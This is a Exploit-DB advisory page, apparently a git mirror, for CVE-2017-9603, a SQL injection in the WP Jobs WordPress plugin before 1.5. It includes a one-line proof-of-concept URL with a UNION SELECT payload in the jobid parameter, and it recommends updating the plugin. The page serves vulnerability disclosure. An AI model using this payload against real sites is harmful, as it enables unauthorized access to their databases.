bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/42172.txt
Offensive Security b946aa7e86 DB: 2017-06-15 
5 new exploits

Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - set_selection() UTF-8 Off-by-One Local Exploit
Linux Kernel 2.6.24_16-23 / 2.6.27_7-10 / 2.6.28.3 (Ubuntu 8.04/8.10 / Fedora Core 10 x86-64) - 'set_selection()' UTF-8 Off-by-One Privilege Escalation

Easy MOV Converter 1.4.24 - 'Enter User Name' Buffer Overflow (SEH)

WarFTP 1.65 - (USER) Remote Buffer Overflow
WarFTP 1.65 - 'USER' Remote Buffer Overflow
Google Chrome - V8 Private Property Arbitrary Code Execution
HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution
WordPress Plugin WP Jobs < 1.5 - SQL Injection
WordPress Plugin Event List <= 0.7.8 - SQL Injection
2017-06-15 05:01:27 +00:00

50 lines
1,015 B
Text
Executable file
Raw Blame History

# Exploit Title: WordPress Plugin WP Jobs < 1.5 - SQL Injection
# Date: 11-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://en-gb.wordpress.org/plugins/wp-jobs/
# Vendor Homepage: http://www.intensewp.com/
# Version: 1.4
# CVE : CVE-2017-9603
# Category: webapps
1. Description:
SQL injection vulnerability in the WP Jobs plugin before 1.5 for WordPress
allows authenticated users to execute arbitrary SQL commands via the jobid
parameter to wp-admin/edit.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/edit.php?post_type=job&page=WPJobsJobApps&j
obid=5 UNION ALL SELECT NULL,NULL,NULL,@@version,NULL,NULL-- comment
3. Solution:
A new version of WP Jobs is available. Update the WordPress WP Jobs to the
latest version.
4. Reference:
http://dtsa.eu/cve-2017-9603-wordpress-wp-jobs-v-1-4-sql-injection-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9603
Reference in a new issue View git blame Copy permalink